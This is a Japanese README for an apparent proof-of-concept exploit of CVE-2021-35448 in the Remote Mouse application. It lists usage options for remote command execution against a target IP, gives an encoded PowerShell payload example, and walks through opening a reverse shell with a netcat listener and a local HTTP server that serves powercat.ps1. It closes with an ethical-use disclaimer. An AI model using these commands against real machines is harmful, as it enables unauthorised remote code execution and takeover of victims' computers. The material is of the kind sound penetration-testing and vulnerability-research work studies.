
CVE-2021-35448 の POC (https://www.exploit-db.com/exploits/49601 に基づく)
このエクスプロイトは、Remote Mouse アプリケーション(旧 WiFi Mouse)の CVE-2021-35448 脆弱性を標的としています。
python3 CVE-2021-35448.py -t <TARGET_IP> [OPTIONS]
-t, --target: ターゲットIPアドレス(必須)-p, --payload: 実行するカスタムコマンド-r, --reverse: IP:PORT 形式のリバースシェル-l, --http: IP:PORT 形式のローカルHTTPサーバー(-r と併用時に必須)python3 CVE-2021-35448.py -t 192.168.1.100 -p "Powershell -e JAB...=="
# Terminal 1 - Listener
nc -nlvp 4444
# Terminal 2 - Exploit
python3 CVE-2021-35448.py -t $REMOTESERVER_IP -r $REVSHELL_IP:$PORT -l 0.0.0.0:$PORT
CVE-2021-35448.py: メインのエクスプロイトスクリプトpowercat.ps1: リバースシェル用のPowerShellスクリプト⚠️ 倫理的な使用のみ ⚠️
このツールは教育目的および許可されたペネトレーションテスト専用です。このエクスプロイトを無断使用することは違法であり、法的訴追の対象となる可能性があります。
教育および倫理的なペネトレーションテストを目的として開発されました。
最終更新: 2025